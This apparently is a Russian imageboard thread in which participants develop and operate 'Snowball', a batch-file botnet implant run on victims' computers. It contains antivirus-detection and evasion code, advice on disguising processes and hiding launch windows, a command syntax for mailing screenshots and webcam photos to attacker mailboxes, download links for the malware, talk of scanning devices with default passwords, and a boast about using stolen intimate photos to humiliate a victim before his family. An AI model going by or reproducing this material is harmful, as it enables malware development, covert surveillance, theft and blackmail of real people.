YOBA, ты?
>>49335
Какая версия-то? Было дело, я исправил. Но вообще с этими детектами могут быть разные странности, вот один человек жаловался, мол, касперский детектит. Я поставил на виртуалку, включил параноидальный режим эвристики - не детектит, на вирустотал чисто, а у него вот детектит.
Последнюю версию можешь найти здесь: http://pinkamena.wen.ru
Алсо тхред уже есть: http://2ch.hk/i/res/43740.html
>>49337
Няш, я тут не был джва года. Можешь вкратце рассказать, что тут произошло, какие новые проекты? YOBA-пак заброшен? Strangelove и карасик заброшены? Теперь вы пилите Snowball из твоей ссылки?
> YOBA-пак заброшен
Eeyup. Смысла больше нет, радмин-серверов неприсвоенных почти не осталось. Но если тебе нужно что-то такое, что могло бы там появиться, не будь он заброшен, спрашивай.
> Strangelove и карасик
Он вроде на какой-то секретный хакерский сайт свалил, но по слухам, и сюда инкогнито наведывается.
> пилите Snowball
Почти не пилю, так, баги исправляю.
>>49339
Почитал сейчас твой код. Эти комментарии из белиберды, это ведь для защиты от антивируса или я не могу в кодировки?
Вообще, ты не думал сделать нормально с точки зрения безопасности, чтобы не выкладывать пароли в общий доступ? Скажем, сделать шифрование с асимметричной парой ключей. По идее, декодер прикрутить туда просто, пару строчек займет.
YOBA, раз уж ты тут, встрой в snowball удобный граббер паролей пжалки
Аноны, кто подскажет как к http-файловому серверу подключиться?
Ввожу IP хомяка в строку браузера и не работает ничего, при этом на почту пришло извещение, что http-сервер установлен
Да, пробовал создать на нескольких пк, всегда приходят сообщения, но при этом не могу подключиться
>>49341
Executor и прочие сразу антивирусы палят. А если похуй - качай и запускай через Snowball.
у меня с makevnc тоже самое, извещение приходит но при этом коннекта нет
>>49341
!!snowball\! шаблоны obey\01. пароли браузеров\ посмотри.
>>49340
> Эти комментарии из белиберды
Скорее всего, кодировка неправильная у тебя. Тот файл в кодировке 866.
> чтобы не выкладывать пароли в общий доступ
А смысл их прятать? Почту на мейл.ру зарегистрировать пять минут занимает.
>>49342
>>49347
Может, он у тебя за роутером или фаервол блокирует. Извещение об установке сообщает лишь, что ему удалось запуститься, т.е. что он сейчас в процессах, но не гарантирует его работоспособности. Вообще все эти make* жутко костыльные штуки, там скрытый запуск через runfromprocess.
>>49348
>смысл их прятать
Так ты отдельную почту для каждого делаешь? А как же автоматизация, все дела?
>>49349
Зойчем для каждого? У меня есть одна специальная почта для получения отчетов с хомяков. Я ее больше нигде не использую.
>>49350
Ну дык если ты на сайт выкладываешь пароль к ней в cheese.txt, то первый же школьник получит всю инфу с твоего ботнета.
>>49351
Вовсе нет. Вот я получу и удаляю, и ты так делай. Не надо хранить письма-то. Или ты веб-интерфейсом пользуешься? Я использую почтовый клиент opera, в настройках убираешь галочку «оставлять сообщения на сервере» и все дела. Ящик всегда пустой. Алсо cheese.txt надо после использования очищать, чтоб боты были в медленном режиме.
Значитца, действительно аваст сагрился на личинку, и конкретно его возбудила эта вот строчка:
For /F "Tokens=2 Delims=: Eol=┐ Usebackq" %%G In ("SC Query type= service | FINDSTR /i /c:"avast!" /c:"Kaspersky" /c:"AVG" /c:"Dr.Web" /c:"ESET" /c:"Avira" /c:"Microsoft Antimalware" /c:"any_other"") Do Set antivir=%%G(определеитель антивируса).
Если срочно, можно просто ее убрать. Не будет определять антивирус. Ну или маленько подождите, поправлю (разобью на несколько). Без этой строчки вроде не детектит.
https://www.virustotal.com/ru/file/98c104a6d03dab4f4434cf29b19d98cc9ac69c0e29d6912372f529becc02e77a/analysis/1388866775/
Хотя вот доктор веб на что-то среагировал.
В общем, вот версия, не детектящаяся авастом. Доктором вебом потом займусь.
http://pinkamena.wen.ru/versions/xvid_2.13.1.rar
>>49337
Кстати, тот же Касперский перестал её палить. Проверил. И теперь у меня тестовых виртуалок есть разных, напоминай, если понадобится.
>>49352
Так-то оно так, но при должной сноровке можно перехватить как письма они же у тебя не десять раз в секунду забираются, лол, так и cheese.txt, за 5 минут между запросами в медленном режиме можно легко успеть даже вручную, не говоря уже о написании забирающего скрипта.
>>49359
Лол, да пускай. Ну увидит он скриншоты и фото с вебки, управление-то не перехватит.
Шифровать в принципе можно, или еще проще сохранять отдельное мыло на стороне личинки. Но, честно, смысла не вижу. Сам почту получаю практически незамедлительно, запущен квип с извещением о новых сообщениях, вот и все дела.
Попробовал твою личинку. Ты это все, скорее всего, знаешь, но все же.
При запуске мелькает окно командной строки где-то на секунду. Через пять минут закукарекал брандмаузер с просьбой разрешить доступ для ftp.exe.
>>49364
При удалении colhost остается висеть в процессах и в результате вся папка web не удаляется.
>>49365 Запусти Монитор Ресурсов и заверши всю ветку процессов
>>49364
> При запуске мелькает окно командной строки
Только в первый раз, когда запускаешь установочный файл, это можно назвать "при установке", а не "при запуске". В дальнейшем запуск осуществляется скрыто.
> брандмаузер с просьбой разрешить доступ для ftp.exe
Тут уж ничего не поделаешь. ftp.exe, кстати, родной виндовый у многих брандмауэров по дефолту в вайтлисте.
>>49365
> При удалении colhost остается висеть в процессах
svchost.exe наверное? Это копия ping.exe, используется как таймер, и висит в процессах столько, сколько ему назначено, вероятно, пять минут. Ты, видимо, удаляешь вручную, вот он и остался висеть. Для удаления же у хомяка есть специальная команда "panic".
>>49369 Нет, именно colhost, а файл остается - второй экзешник, находящийся в папке, помимо пинга.
>>49369 И да, удалял именно через panic.
Алсо, почему я не вижу Эпплджек на твоих аватарках?
>>49369 Вдогонку, может, он и не из твоей сборки был, но папка web удалилась после panic не вся, там остался один файл. Он не удалялся, будучи открытым в другом приложении. Когда я убил colhost, он удалился.
>>49371
Я не знаю, что такое "colhost", это не мое.
Второй файл остался? Хм... Наверное, был в этот момент запущен spoolsv.exe (wget переименованный), пытался что-то скачать. Я пожалуй усовершенствую panic, пусть удаляет отдельным батником, который убедится в полном удалении и только после этого удалится сам.
Алсо, еще пара замечаний. Твои процессы переименованы, но в правой колонке с описанием процесса в диспетчере задач у svchost все равно написано "ping tool". На мой взгляд, это еще подозрительнее, чем непереименованный пинг, резко выбивается из списка остальных svchostов. Вроде была утилита, позволяющая редактировать отображаемое описание под вендой, даже в набигаче ее вбрасывали.
xvid тоже достаточно подозрительное название, многие хомяки не слышали ничего про кодеки а x<что-то там> сразу навевает мысли на xtreme, xray и вообще что-то вирусообразное. Вот я переименовал все в MS**, и ты так делай, упоминание майкрософт должно успокоить хомяка.
И еще: в процессах перманентно находится cmd.exe, с этим можно как-то бороться? Например, написать костыль на настоящем лол языке программирования, который будет висеть во время ожидания в процессах с нормальными именем, а cmd.exe с батником будет запускаться им на короткий срок непосредственной работы скрипта периодически.
И да, если, например, он качает делалку скриншотов с сайта, то после отправки скриншота он ее удаляет, а потом качает заново? У меня, когда пришел скриншот, никаких новых файлов в папке web не осталось. Если так, то это глупо, можно лишний раз возбуждать антивирусы.
>>49380 На мой взгляд xvid менее подозрителен, чем MS*
Вы тут баги перечисляете, которые все в состоянии пофиксить самостоятельно, а вот с мельканием командной строки при установке надо что то делать
>>49382 Так если ты сам будешь устанавливать, то тебе похуй, по идее. Или ты надеешься, что кто-то запустит хуй знает какой батник, не прочитав содержимое?
>>49379
> резко выбивается из списка остальных svchostов
В диспетчере задач не видно. Если же ты используешь ёба-менеджеры процессов, от тебя не скроется.
> xvid тоже достаточно подозрительное название
Там в начале файла в переменных задаются имена и места, можно другое выбрать.
>>49380
> перманентно находится cmd.exe, с этим можно как-то бороться
Можно сделать копию cmd.exe и переименовать ее во что-то, наверное, и запускать с нее.
>>49380
> делалку скриншотов с сайта, то после отправки скриншота он ее удаляет
Вовсе нет. Просто личинка качает самые необходимые файлы, без которых не сможет работать, в свою папку, а все остальные - в %temp%. nircmd.exe там лежит.
>>49382
> с мельканием командной строки при установке надо что то делать
Как ты запустишь батник без мелькания окна? Даже если он из одной строчки "echo off". И ты же личинку не раздаешь в виде голого батника "чувак, запусти этот батник, прикинь, он не делает ничего, даже окно не мелькает", ты ее устанавливаешь из инсталлятора? В паке есть !!snowball\пример инсталлятора\installer.exe, вот он запускает при помощи nircmd.exe с ключом exec hide без мелькания.
Да, кстати, насчет секурности, совсем забыл: там теперь можно использовать два мыла, одно одноразовое, одно более закрытое, и никаких утечек.
http://pinkamena.wen.ru/help/commands/syntax.html
Начиная с версии snowball_2.9 личинка умеет работать с двумя мылами, отправляя с одного (несекретного) на другое (секретное). Для этого второе, секретное мыло, следует написать через запятую после несекретного.
Пример команды:
=================
sugarcube,040114
smtp
smtp.equestria.com
почта[email protected] , почта[email protected]
пароль_от_почта1
everypony
everypony
hey
================
Этот командный файл повелевает всем юнитам, в какую бы группу они ни входили, выполнить "hey" и отправить результат на емейл почта[email protected] c почты почта[email protected] с паролем " пароль_от_почта1 ".
>>49388
>В диспетчере задач не видно
В спермерке в дефолтном еще как видно, попробуй.
>>49388 Реквестирую ссылку на пак, у тебя же только версии батника на сайте.
>>49389
Годно. Но в этом случае лучше не давать вообще всем поням общее мыло отправителя, т.к. за массовую рассылку могут заблокировать.
>>49391
http://rghost.ru/47506999 вот 2.12, батник последней версии отдельно - http://pinkamena.wen.ru/versions/xvid_2.13.1.rar
То и дело антивирусы реагируют на мой батник, и реагируют, что интересно, на довольно-таки необязательные функции. Ну не то чтобы совсем бесполезные, но явно не критичные. На некоторые строчки в команде самоудаления, например, на строчку определителя антивируса. Пусть и нечасто, но каждый раз несём потери.
И вот думается мне, а не сделать ли суперультрайобатонкую версию, где есть одна-единственная команда - «obey»? А все команды подаются в виде полноразмерных батников со стороны сервера, т.е. от управляющего и выполняются как внешний батник. В виде шаблонов это все будет. Конечно, размер командного файла получится заметно больше (ну, в среднем вроде килобайт-два-три против ста байт прежних), и конечно это шаг назад, будет похоже на лоховской скрипт с хакер.ру, но, во-первых, максимум резист от антивирусов (чем проще основной скрипт - тем меньше внимания, а дополнительные скрипты и обработаются как другие, т.е. если что не так, они удалятся антивирусом, а основной не тронут), а во-вторых, не нужно будет обновлять личинку, клиентскую часть, если я изобрету новые команды, их нужно будет просто добавить к серверной части (под сервером подразумеваю хэккира и то, чем управляет он).
Что думаете о таком?
Только со старыми версиями не будет совместимо. Ну что ж, зато от атавизмов избавлюсь.
Попробуй, но тогда добавь в сборку несколько готовых шаблонов для obey. И было бы круто если бы в сборке была функция удобного подключения для просмотра экрана makevnc и makehttp не пашет совсем
А хомяков тупо брутите?
>>49524
Кстати. Насканил видеорегистратор с дефолтным паролем пикрелейт. Всё правильно делаю, сосоны?
>>49531
В Подмосковье отключились камеры ГИБДД
13/01/2014 14:11
В Московской области перестали работать все стационарные камеры, которые фиксируют нарушения правил дорожного движения. Причина выхода комплексов видеофиксации из строя неизвестна, сообщает 13 января РИА Новости со ссылкой на пресс-службу областного управления ГИБДД. Восстановить работу всех комплексов в ведомстве пообещали к четвергу, 16 января. В Госавтоинспекции уточнили, что по состоянию на 17:00 в строй ввели десять камер. «Газета.ру» сообщала о том, что дорожные камеры отключились из-за компьютерного вируса.
http://uinc.ru/news/sn21146.html
>>49537
>повреждена файловая система, что делает невозможным запуск операционной системы Windows XP и специализированного программного обеспечения комплексов;
— повреждены системные журналы операционной системы; на системном диске С:
— найден инородный вредоносный пакетный файл 222.bat, настроенный для автоматического изменения пароля операционной системы и запуска исполняемого файла 1.exe;
— изменены пароли на доступ в операционную систему с правами администратора.
Лол. http://habrahabr.ru/post/208962/
>>49531
Неправильно. Надо быть доброй и чуть шаловливой няшей, а не вандалом.
>>49554
Помню еще во время радмин тредов, когда сл еще тут сидел, насканил хомяка.
Один дядя, был в командировке и ебался с какой-то тупой шлюхой. Я ясное дело всё это сфоткал. Когда он вернулся домой, открывал фоточки с еблей перед его женой и дочкой. Он отмазывался, говорил что мол это друзья его над ним подшутили, фотомотаж сделали. Звонил кому-то. Жена естестбенно расплакалась и всё такое.
Такие дела.
>>49572
А ты думал, они позовут шлюху и поебутся вчетвером тут же?
ёбушка, как там новая версия?
>>49679
Серверная часть как бы немножко готова (она всего ничего, 3кб), вот делаю сейчас шаблоны. Вернее прямо сейчас не делаю, мне лень пока, но сделаю скоро.
Когда сделаю, запилю новый тред.
>>49683
Ёба, есть довольно больная идея. Может годно а может нет, не знаю.
Что если вместо того что-бы таскать за собой в дроппере wget и nircmd, не вписать их в тело самого xvid? А потом через echo "сам nircmd" > nircmd.exe создавать его? Не знаю если ты понял что я имею ввиду.
Из плюсов, отпадает нужда таскать за собой бинарники, а из минусов то что вес увеличится и может у ав шишка вставать будет. Не знаю, может стоит попробовать. Как думаешь?
>>49693
Склеить-то легко, а разделять потом без сторонних программ как?
>>49697
а зачем разделять? Просто через echo создать бинарник и всё. Или ты имеешь ввиду после создания бинарника как выпилить его код из xvid.bat?
>>49698
Ну вот смотри, выполнил я "copy /b xvid.bat+wget.exe new.bat", как без сторонних программ потом этот слиток разделить от такого-то байта до такого? Может, и можно как-то, но я не умею. Сторонними программами могу, но тебе ведь нужно не это. Через "echo" точно не выйдет, он бинарный код не запишет.
>>49744
В качестве такого костыля я давным-давно использую sfx от rar. Там тоже можно установочный скрипт запилить.
>>49335
палю годноту: любой .exe можно переименовать в .bat, если обычным текстовым редактором добавить туда строки типa
echo rename %0 huita.exe>newbat.bat
echo каким-нибудь циклом удалить первые строки файла>>newbat.bat
echo start "" %0>>newbat.bat
start newbat.bat
exit
проблема в вырезании первых добавленных строк путём бата, попытался юзнуть for /f, но он меня отхуесосил за мутные символы.
>>49786
> каким-нибудь циклом удалить первые строки файла
> попытался юзнуть for /f, но он меня отхуесосил
Так в том и проблема, ты не можешь обработать бинарный файл как текстовый.
>>49786
>палю годноту: любой .exe можно переименовать в .bat
Давно я так не проигрывал.
>>49335 еба, когда сделаешь нормальную админку?
готовый к сотрудничеству c#-кун
>>49810
Ты имеешь в виду, с веб-интерфейсом? Никогда, лол. Я не умею в сайтостроение.
не нашёл soviet-треда
посоветуйте сканер диапазона айпи на простой пинг и вывод всех откливнувшихся в текстовый файлик(unix/win, похуй).
пытался в Nmap это сделать, но не вышло что-то.
>>49817
>пытался в Nmap это сделать, но не вышло что-то
Взломач, со вчерашнего дня snowball снова стал детектитьтся !avast